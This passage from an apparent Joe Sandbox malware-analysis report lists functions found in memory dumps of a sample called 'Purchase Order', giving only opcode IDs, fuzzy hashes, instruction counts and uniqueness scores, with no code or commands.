                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4f9b1858e1fa96c038456f9524842c27dc6e00d6b2cf081c5443905b0f93ab49
                                                                                                            • Instruction ID: 3fd6f9533a3779e5aa08de256d8dba484a510a3c3a30fcab4587e2283a11fbe0
                                                                                                            • Opcode Fuzzy Hash: 4f9b1858e1fa96c038456f9524842c27dc6e00d6b2cf081c5443905b0f93ab49
                                                                                                            • Instruction Fuzzy Hash: A8F08C70D08108DBC704CF69C541AFDBBBCEB49340F00D1A6A90D9F211DB318A42DFA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BD94B Relevance: .0, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0b607b9677367133d11187791f98b0676cee0a401f2390a53d024d227bd179fc
                                                                                                            • Instruction ID: 723266e368c832a7a4d3cd5c771dee59cc050551b58198c79f2add2bb2ea29a5
                                                                                                            • Opcode Fuzzy Hash: 0b607b9677367133d11187791f98b0676cee0a401f2390a53d024d227bd179fc
                                                                                                            • Instruction Fuzzy Hash: CA017CB5D082848FC744DF78E5584EDBFF9FB59315700A1AAE4199B352C731A942CF21
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BBD6C Relevance: .0, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 272550e106ca07813d4e1f3eaeaa614cc399c2966ec31eef6607db3e02c4a6c9
                                                                                                            • Instruction ID: 21e918c3efdd98ec46d797dc5e0563f5cc9b6128fe3effedf60fb119534963d0
                                                                                                            • Opcode Fuzzy Hash: 272550e106ca07813d4e1f3eaeaa614cc399c2966ec31eef6607db3e02c4a6c9
                                                                                                            • Instruction Fuzzy Hash: B1F0AF70918318CFCB44CF64C9A48EC7FF9FB4E340B04508AE00AAB222D6358902DF30
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B30D1 Relevance: .0, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a9c218cd597a5e780b6ac86a12928a3cdd8d5c4757b950c12c4902889e8ea49e
                                                                                                            • Instruction ID: 5bced26a534ec538c607ef9c928b72f22e55fb6d7126d93b658a95f9446dfded
                                                                                                            • Opcode Fuzzy Hash: a9c218cd597a5e780b6ac86a12928a3cdd8d5c4757b950c12c4902889e8ea49e
                                                                                                            • Instruction Fuzzy Hash: A2F03CB4D0A25AEFCB00CFE8D9405EDFFB4EB05351F2015AA9425BB381E3354A42CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B2789 Relevance: .0, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fab3cdc035b988704ba78d1d19c475c3f51069c89e3141a39262915fa851e938
                                                                                                            • Instruction ID: 7705c33bff4fc928110d436cb35285c99e1b2c6f0391de2047f50e42c6546690
                                                                                                            • Opcode Fuzzy Hash: fab3cdc035b988704ba78d1d19c475c3f51069c89e3141a39262915fa851e938
                                                                                                            • Instruction Fuzzy Hash: 81F06D38A4420DDBCB20CF64D849AFDBBB4EB5A341F005066E42EDB710EB719982CF20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B6C10 Relevance: .0, Instructions: 33COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7c146c518dbe6a3e999bfed2ba13398a677074e7ef2caab1375c6393e2ba688d
                                                                                                            • Instruction ID: 2626aa61349a584611b5b47b288f5528b55589158d03c57bddb04ecfa0c24861
                                                                                                            • Opcode Fuzzy Hash: 7c146c518dbe6a3e999bfed2ba13398a677074e7ef2caab1375c6393e2ba688d
                                                                                                            • Instruction Fuzzy Hash: 61F05E726041086FDF08DB99DC55E9ABBB9EB04260F14C16AF408DB251E631E95087A4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B30E0 Relevance: .0, Instructions: 33COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 15f14bde05c1e079f21a5b3039da0e719d421e8444e045ae64809d24f2676e77
                                                                                                            • Instruction ID: d08c396fb7d3d88606072f1395b07102dd1a873995c442f4198075f749f0d13f
                                                                                                            • Opcode Fuzzy Hash: 15f14bde05c1e079f21a5b3039da0e719d421e8444e045ae64809d24f2676e77
                                                                                                            • Instruction Fuzzy Hash: 5AF092B4D0621AEFCB40DFA9D9415EEBBF8EB09340F1055AA9815B7304E7315A418B61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586F2D9 Relevance: .0, Instructions: 32COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 821f3dad47f84f0bb187fe4cd760ebdba8fe5667e8cb18135bc7483847e280d6
                                                                                                            • Instruction ID: a9c382c19ee0030fe4dbe4c615ec3f38602d6723e8849c94433a4b780c7691c6
                                                                                                            • Opcode Fuzzy Hash: 821f3dad47f84f0bb187fe4cd760ebdba8fe5667e8cb18135bc7483847e280d6
                                                                                                            • Instruction Fuzzy Hash: 2DF0F935B001198FCF15EB98E5949DDB3F6FF88A11F154099D909B7364CB35AD01CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B1BED Relevance: .0, Instructions: 30COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ff02c3097e5e5d26baa3b083230c1d10d079bbdace5c79138f764921ba1f2153
                                                                                                            • Instruction ID: 98ff28000167fb5513f10fb57c1211c1841d1530f3095dfb991f923fb1a0e2d8
                                                                                                            • Opcode Fuzzy Hash: ff02c3097e5e5d26baa3b083230c1d10d079bbdace5c79138f764921ba1f2153
                                                                                                            • Instruction Fuzzy Hash: DFF01D3561D105CFDB44DA99D4697E933E0EB4835AF14046AE4059F690E7388586CF31
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586E3F0 Relevance: .0, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2ed57348a4f1c2a4b6e192bc3191a6fbc9890cfa61bc1fb0aa4050332e3bafb5
                                                                                                            • Instruction ID: 94bd8d465816d2b3c8b6971b5b8ff1cb7b48b2d5265219a1ea37ab7c6af8ce67
                                                                                                            • Opcode Fuzzy Hash: 2ed57348a4f1c2a4b6e192bc3191a6fbc9890cfa61bc1fb0aa4050332e3bafb5
                                                                                                            • Instruction Fuzzy Hash: 92E022B24083945FC71267949C10BB43F649B12384F0B10DADB448F283E1224C16CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BEE79 Relevance: .0, Instructions: 28COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a9f275a35da75e37f640ae3772da70619e92e88a3a9e6b1b0276bb8b6fc9ce08
                                                                                                            • Instruction ID: 4e89ddba17cfa26ef74d4804667af3b4c1b4f7cd5b1367f862bb6ae8b7de32ee
                                                                                                            • Opcode Fuzzy Hash: a9f275a35da75e37f640ae3772da70619e92e88a3a9e6b1b0276bb8b6fc9ce08
                                                                                                            • Instruction Fuzzy Hash: 7FF01239D01208ABCF54DFA8E846ADEBFB0EB99311F1080AAA805A7350D6304A95DB52
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B25F0 Relevance: .0, Instructions: 28COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 443e230c2f2eff61737f4bf9f6173fdb71f29c5aaab9b3763119c9d663187ea6
                                                                                                            • Instruction ID: b91e7f72402ba1305b36dc234d65329a3c162461b04182c416de09c27c7b9b20
                                                                                                            • Opcode Fuzzy Hash: 443e230c2f2eff61737f4bf9f6173fdb71f29c5aaab9b3763119c9d663187ea6
                                                                                                            • Instruction Fuzzy Hash: A5E0923084920CEBC704DFA4D9499FEBF79EB1A352F10A056E82927210CF715952DBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B0CE2 Relevance: .0, Instructions: 27COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 76883d5cb569cbda159c268ada30ac03579274e273278a8a4f37169039d28bc9
                                                                                                            • Instruction ID: fb5ecbdb406cb638a4bb18fc39639511b0ee18013d52a0d25e77221f0d381fc6
                                                                                                            • Opcode Fuzzy Hash: 76883d5cb569cbda159c268ada30ac03579274e273278a8a4f37169039d28bc9
                                                                                                            • Instruction Fuzzy Hash: 85E068327106180FC724A50CD804B7E339BDFC8622F1900BAE500C73A6DC249C014755
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586A630 Relevance: .0, Instructions: 27COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 079cafe9cee56cc8e5b68fe86252b00b0845f21acf42be68c90b28b0a9da0684
                                                                                                            • Instruction ID: fdf0bf67c64360165e7e16eb1d99f14776732e5ac71d264a465f1637a7d066e3
                                                                                                            • Opcode Fuzzy Hash: 079cafe9cee56cc8e5b68fe86252b00b0845f21acf42be68c90b28b0a9da0684
                                                                                                            • Instruction Fuzzy Hash: 86E06D33202524C7C304EB4CF8814B6B3E8F745AA53188166EC0DCA618E226D822C780
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BBE14 Relevance: .0, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 956fa371f182129328945ba166a8dfd4078117cb3831da08a0737dc29199c2f0
                                                                                                            • Instruction ID: 0315acad95b56c931a518599cc3f2ffc7c1d82ff9a25d19b998cebba3a3df52e
                                                                                                            • Opcode Fuzzy Hash: 956fa371f182129328945ba166a8dfd4078117cb3831da08a0737dc29199c2f0
                                                                                                            • Instruction Fuzzy Hash: DBE04F3556D50CCBD714CA12C8644F8777DFB8E380B40615A915B4F226DD7545079564
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B0CF0 Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67882099b3591c705d4e391aa7c00b46f06070083a524e8abf0ab6fbc57a1798
                                                                                                            • Instruction ID: f8fb2e5d7cea3e6e3f154f2621fe519681838bcf7caa9690fd46f5ad264c3d13
                                                                                                            • Opcode Fuzzy Hash: 67882099b3591c705d4e391aa7c00b46f06070083a524e8abf0ab6fbc57a1798
                                                                                                            • Instruction Fuzzy Hash: 99E0C2363216150BCB28AA4DE804A7E339FEFCDA22B1940BAE505CB75ACD65DC0147A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BEE88 Relevance: .0, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9b81003c641763c863530b95796cac77e4e7acf67da69e845b85eef2944fbdc1
                                                                                                            • Instruction ID: f7ffeacfd1e651320273202a95a25141082ff2a25d213fcd74d0addf966a326e
                                                                                                            • Opcode Fuzzy Hash: 9b81003c641763c863530b95796cac77e4e7acf67da69e845b85eef2944fbdc1
                                                                                                            • Instruction Fuzzy Hash: D0F01538D0020CEBCB50EFA8D944A8DBBB5EB88310F00C0AAA804A7340D7305A50DB92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B0EB9 Relevance: .0, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4b7e4f6e25bd57a7d162efc48ea531cb07d7374e42a48fdb8e05e8f9df5c16a5
                                                                                                            • Instruction ID: 825fb2a606de48339f5d9993996cc13708fcd3ec74c40ccb2e564e802851e238
                                                                                                            • Opcode Fuzzy Hash: 4b7e4f6e25bd57a7d162efc48ea531cb07d7374e42a48fdb8e05e8f9df5c16a5
                                                                                                            • Instruction Fuzzy Hash: 93E0DF33E201186BCB159AA9E816AEDBB79EB88312F41403AE915B7740DB3029149B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586BD24 Relevance: .0, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 85e9bf53fbd0f6829ad20f2502939bbf55f4493492acb0dfd11b6818630ac84f
                                                                                                            • Instruction ID: 138e0c1f8d71b3f84de6ae96f2db75b42efd3df0061552b33d2ed803473a5e8b
                                                                                                            • Opcode Fuzzy Hash: 85e9bf53fbd0f6829ad20f2502939bbf55f4493492acb0dfd11b6818630ac84f
                                                                                                            • Instruction Fuzzy Hash: 78E04F352140048BC711EA1CD5C9BF533A5FB4A354F1989B3FD89DB211C635AC42CB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BB275 Relevance: .0, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bd11263096b70d486cad4ce121ed7cb462e999e930f06a7ea92e7384e2600fad
                                                                                                            • Instruction ID: 22a254d93c526fb9a4aaefceb714d8f85a496d4e0bc624c3be702c43d298503b
                                                                                                            • Opcode Fuzzy Hash: bd11263096b70d486cad4ce121ed7cb462e999e930f06a7ea92e7384e2600fad
                                                                                                            • Instruction Fuzzy Hash: 45F0547891525ACFCB60CF54D985BECBBB4BB09300F509496E819A7711E6309E81DF10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05869668 Relevance: .0, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5bad7f047d1942ca70c297ed59daa897d2ab3baa507ca69b503eb1949bcfa92b
                                                                                                            • Instruction ID: 98f8c23d1956c7334374fd6718ba4115977c880dd916bb258bd63f2f401fe720
                                                                                                            • Opcode Fuzzy Hash: 5bad7f047d1942ca70c297ed59daa897d2ab3baa507ca69b503eb1949bcfa92b
                                                                                                            • Instruction Fuzzy Hash: 6EE0CD37145218AF870557C99CC4CD5BF99EB4D360308C452F64A47132C5128C10E791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586A508 Relevance: .0, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b2684134537d97707880b01fcedfdaa6c8ddca34e0df2fa13a566595c8794eb0
                                                                                                            • Instruction ID: 09493bfce28f5695ff6f2fb429d053f108c066b37a35c7a1142f9de5688d64cf
                                                                                                            • Opcode Fuzzy Hash: b2684134537d97707880b01fcedfdaa6c8ddca34e0df2fa13a566595c8794eb0
                                                                                                            • Instruction Fuzzy Hash: 15E0863B2055449FCB034BD4AD45ED57FA56F49220B0DC4DBE6495B173C1218460EB11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B1BB1 Relevance: .0, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f4c6c32fd8238959991024bef73cf3f56636abcbd87fd93b364b5d7047bedd47
                                                                                                            • Instruction ID: 84fd62e517a6dbff59a2618467d7db907869a5305783490af4d4890da49228c7
                                                                                                            • Opcode Fuzzy Hash: f4c6c32fd8238959991024bef73cf3f56636abcbd87fd93b364b5d7047bedd47
                                                                                                            • Instruction Fuzzy Hash: 62E01A366181158FCB409EA9E8987EC33F0FB48326F0444A9E005DF2A0EB389946CF20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586A679 Relevance: .0, Instructions: 18COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 325e772f721c44c5c25303ece796f4cdf0c1c932b7c543ea565765de16367e8d
                                                                                                            • Instruction ID: 1f0339c24a250d1a59569660658eb3b565a05bedd92ac83cdd3742e1a987f55e
                                                                                                            • Opcode Fuzzy Hash: 325e772f721c44c5c25303ece796f4cdf0c1c932b7c543ea565765de16367e8d
                                                                                                            • Instruction Fuzzy Hash: BFE0EC3BA10518DFD714AB4CEA89B987762E700315F4A80A1D989BB245C738EDA18F95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BFB10 Relevance: .0, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 38602f1329dbb18b70004464cac57221e933c970d52eb27cd023336b4943a457
                                                                                                            • Instruction ID: b7d09f3e7e8a7208cf7fc6b9322b95c4f68571f9dcb9225958dcdb6820af3ba7
                                                                                                            • Opcode Fuzzy Hash: 38602f1329dbb18b70004464cac57221e933c970d52eb27cd023336b4943a457
                                                                                                            • Instruction Fuzzy Hash: 10E0C23490520CDBCB10EFA8D959A9DBFB8EB44301F8040EDE80457380CA300E45D792
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 058695F8 Relevance: .0, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: efd1755e08d0933aa956bf3d4356905235be60af95313fc74046b12bb025104d
                                                                                                            • Instruction ID: 143eee119e05b57ebaeebeef416a5f68746deb9104e15330ddbe0b834314710e
                                                                                                            • Opcode Fuzzy Hash: efd1755e08d0933aa956bf3d4356905235be60af95313fc74046b12bb025104d
                                                                                                            • Instruction Fuzzy Hash: CCD0A7322011187BC6003598480597A7B9DEB4575CB145449F7045A001D653AC138785
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 058695C8 Relevance: .0, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3a2deb6fb427b891037125f5a74818d6e0dca2b49fdc6b0119bafd4f96f3a01b
                                                                                                            • Instruction ID: d687ce32b686b8565fdc7a221d06b738c4a5b5773142ee01f4a866d51049344c
                                                                                                            • Opcode Fuzzy Hash: 3a2deb6fb427b891037125f5a74818d6e0dca2b49fdc6b0119bafd4f96f3a01b
                                                                                                            • Instruction Fuzzy Hash: 24D0C93A04510CBFCB016FC4DC98E65BFAAEB48311F45D891FA098B172CA22D960FF56
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586F29E Relevance: .0, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 913557cc4a46975100c378d1721ee1ff1a444517987ace967591c54a646f0396
                                                                                                            • Instruction ID: 382b328852c1b7448686d02ce7cc6781384bf84e450820713f12f270201966e0
                                                                                                            • Opcode Fuzzy Hash: 913557cc4a46975100c378d1721ee1ff1a444517987ace967591c54a646f0396
